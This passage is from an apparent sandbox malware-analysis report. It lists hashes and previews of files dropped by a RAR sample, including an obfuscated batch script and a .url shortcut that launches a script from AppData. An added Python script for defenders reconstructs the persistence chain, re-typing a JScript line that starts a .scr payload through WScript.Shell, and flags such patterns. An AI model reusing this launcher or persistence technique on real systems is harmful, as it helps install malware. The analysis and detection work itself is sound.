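    for name, blob in [("random", RANDOM_BLOB), ("text", TEXT_BLOB), ("prefixed_pe", PREFIXED_PE)]:
        print(name, triage(blob))
```

Run the script as-is to see the three rows; on a real drop, read the file in binary and pass the bytes to `triage`, then hash `carve_pe(data)` to get a hash that matches the payload rather than the junk-wrapped container.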
    Process:C:\Windows\SysWOW64\cmd.exe
    File Type:ASCII text, with very long lines (579), with CRLF line terminators
    Category:dropped
    Size (bytes):14057
    Entropy (8bit):5.1259091890276025
    Encrypted:false
    SSDEEP:
    MD5:06A9A6DC642BD8A1484F766845040DDF
    SHA1:A187C475793221D9A6B1591F0D9EF1F63E98E356
    SHA-256:C3C049F72B5BCDE6CC340DA0DE09FC83DA25D29EB967DC55F40D7F54514672D7
    SHA-512:D8E28ECD387C128F1B4E871E0BC5F89D23866D1645B1DA4A6A090F122EB76B3E99C8CA76B3C3B7DB0FDE36515069965BF79A1B67114ACE7AD4CEA2D9265D0CEB
    Malicious:false
    Reputation:unknown
    Preview:Set Uses=V..XPAmateur-Refined-Alternatively-Census-Mail-Participate-Edwards-Jamaica-North-..BiEgg-Subaru-Facing-Developers-Gt-Honor-..gVgDiversity-Greene-Organ-Increases-Exempt-Gnu-Particles-Details-..VWExplorer-Tamil-..IPoSimply-Liberty-Races-Fares-Moss-Express-Monitors-..GBzBulgarian-Infectious-Cock-Tablet-Cattle-Adolescent-..okAgRehab-..KqzRolling-..Set Choosing= ..dmBDLands-Compatibility-Senegal-Adjustment-Retention-..ivAsMonaco-Easy-Banned-..DEwSacred-Renaissance-Delta-Possess-Budgets-Es-Acoustic-..ujGeo-Meal-Greece-Sleeps-..ycJVBikini-Vote-Dividend-Wheels-Preview-Dirty-Modified-Children-Affordable-..LnSectors-Prove-Dip-Lauderdale-Porno-Proposed-Reproduced-Skype-..lrProhibited-Committee-Intervals-Deviant-Institution-Cholesterol-Til-Bitch-Promoting-..OYKvHurt-..Set Corp=7..DgnjSmoke-Fortune-Zoophilia-Habitat-Sail-..krDSArbitrary-Discussing-Corn-Duo-Americas-Alot-Brussels-Practice-Handmade-..XyhRFundamental-Looks-Anne-Sharp-Venezuela-Abuse-Seattle-..XRQnTracker-Pirates-Acdbentity-Se
    Process:C:\Windows\SysWOW64\cmd.exe
    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >), ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):96
    Entropy (8bit):4.808986726283046
    Encrypted:false
    SSDEEP:
    MD5:15BE55EECED96D4F46AA9E8C6BE96E56
    SHA1:34D46D42725D25F68C30A57CADC897AF8FEED121
    SHA-256:68001C41093159918D7D5D8C6F0ED461527F7DED297376911C4A7DA8982007FB
    SHA-512:5106C2F46D0BEEC5B3E7B17C4C114F814D5EB6A489039594024A3D6F2FD03F612245C686FDD562667E85232C5E20D029E167CFAB6439EF0F8E869DBB62FABA7E
    Malicious:true
    Reputation:unknown
    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" ..
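Added example, not code from the report or from the sample: a Python script that reconstructs the persistence chain from the two previews quoted above, the `.url` Internet shortcut whose `URL=` target is the local `NanoCipher.js`, and the one-line JScript that calls `WScript.Shell.Exec` to start `NanoCipher.scr` with a second path as its argument. It also checks the double-extension name of the dropper (`scan_doc_zapit_836893.pdf.exe`) seen in the Process fields. The inputs are the page's own previews re-typed (the `..` in them are the CRLF terminators the File Type lines report); the extension lists, the user-writable path markers and the finding names are my assumptions, and `scan_startup_folder` is a hypothetical helper for running the same parser over a real Startup directory.

```python
"""Reconstruct the startup persistence chain from a dropped .url shortcut and a .js launcher."""
import re
from pathlib import Path, PureWindowsPath
from typing import List, Optional

# Constructed inputs: the two previews quoted in the report, re-typed as Python strings.
URL_SHORTCUT = (
    "[InternetShortcut] \r\n"
    'URL="C:\\Users\\user\\AppData\\Local\\NanoSec Cryptographics\\NanoCipher.js" \r\n'
)
JS_LAUNCHER = (
    r'new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\NanoSec Cryptographics\\NanoCipher.scr\" '
    r'\"C:\\Users\\user\\AppData\\Local\\NanoSec Cryptographics\\o\"")'
)
DROPPER_NAME = "scan_doc_zapit_836893.pdf.exe"

# Assumptions behind the heuristics: which extensions count as scripts / executables / documents,
# and which path fragments mark user-writable locations where no OS component should live.
SCRIPT_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".bat", ".cmd", ".ps1"}
EXEC_EXT = {".exe", ".scr", ".pif", ".com"}
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png", ".rar", ".zip"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def parse_url_shortcut(text: str) -> Optional[str]:
    """Return the URL= target of an [InternetShortcut] file with surrounding quotes stripped, or None."""
    m = re.search(r'^\s*URL\s*=\s*"?([^"\r\n]+?)"?\s*$', text, re.IGNORECASE | re.MULTILINE)
    return m.group(1) if m else None


def is_local_path(target: str) -> bool:
    """True for drive-letter, UNC and file: targets, i.e. anything that is not a web URL."""
    t = target.lower()
    return bool(re.match(r"^[a-z]:\\", t)) or t.startswith("\\\\") or t.startswith("file:")


def parse_wscript_exec(js: str) -> List[str]:
    """Extract the command line passed to WScript.Shell.Exec/Run and split it into argv."""
    m = re.search(r'\.(?:Exec|Run)\(\s*"((?:[^"\\]|\\.)*)"', js)
    if not m:
        return []
    cmdline = re.sub(r"\\(.)", r"\1", m.group(1))  # undo JS string escaping: \" -> " and \\ -> \
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def has_double_extension(name: str) -> bool:
    """scan_doc.pdf.exe style names: a document-looking extension directly before an executable one."""
    suffixes = [s.lower() for s in PureWindowsPath(name).suffixes]
    return len(suffixes) >= 2 and suffixes[-2] in DOC_EXT and suffixes[-1] in EXEC_EXT


def analyze_chain(url_text: str, js_text: str) -> dict:
    """Tie the shortcut and the launcher together and list what a Startup-folder hunt should flag."""
    target = parse_url_shortcut(url_text)
    argv = parse_wscript_exec(js_text)
    findings = []
    if target and is_local_path(target):
        findings.append("url-shortcut-points-to-local-file")
        if PureWindowsPath(target).suffix.lower() in SCRIPT_EXT:
            findings.append("url-shortcut-launches-script")
    if argv:
        exe = PureWindowsPath(argv[0])
        if exe.suffix.lower() in EXEC_EXT:
            findings.append(f"script-launches-{exe.suffix.lower().lstrip('.')}")
        if any(marker in str(exe).lower() for marker in USER_WRITABLE):
            findings.append("payload-in-user-writable-dir")
    return {"shortcut_target": target, "launched": argv, "findings": findings}


def scan_startup_folder(folder) -> list:
    """Hypothetical helper: run parse_url_shortcut over every .url in a Startup folder, keep local targets."""
    hits = []
    for p in Path(folder).glob("*.url"):
        target = parse_url_shortcut(p.read_text(errors="replace"))
        if target and is_local_path(target):
            hits.append((p.name, target))
    return hits


if __name__ == "__main__":
    print(analyze_chain(URL_SHORTCUT, JS_LAUNCHER))
    print(DROPPER_NAME, "double extension:", has_double_extension(DROPPER_NAME))
```

A legitimate `.url` file in a Startup folder carries an `http(s)://` target; one whose target is a drive-letter path ending in a script or executable extension is the pattern the Sigma rules above ("Drops script at startup location", "Suspicious Screensaver Binary File Creation") are keyed on, and `scan_startup_folder` applies exactly that test to a real directory such as the per-user Startup folder.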
    File type:RAR archive data, v5
    Entropy (8bit):7.9998113191783515
    TrID:
    • RAR Archive (5005/1) 100.00%
    File name:#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar
    File size:1'010'278 bytes
    MD5:f46e12150b7b0e381c3cf871325eed8e
    SHA1:57d88bcbf4f6804cdaea6b9c06e0a2a204ec4a6a
    SHA256:35d6eab4f66ce38c0a8953b5fcb3b03bf9f042ca4a4ef8f0555ebabe39ac18f8
    SHA512:b76dc0f752443f751fdc55d5743f63baa97404bde12ec655ca52477a3f8b5f582a98fa362840fb1d624f955663bebb8735c573705c079d1aafb8c73b8f2bd4b1
    SSDEEP:24576:P5g167y+rl6d68YVdLpeRGOKIlwu2Q3crnO+Pt:t7y+lgCL2wuN3crntPt
    TLSH:E8253368CF568848CCAC99F4BB5A9F1CB3228E854545CE0FE611D8D47C4A3473D6FA1B
    File Content Preview:Rar!......I..............]...Q........ .N5c...5.......... ....../...... .............. 937463543.txt......Wq+....q654$.`C.r..wV.{. .q.G....B.T.=0.r(.NI...m.o.xR4J.0.....^...30..R...2.K...#&x..+...]~.*-W.jEs.O.....p.!.nm.[./m..@P.e.E.....=...= .l.c...'....
    Icon Hash:72e2a2a292a2a2b2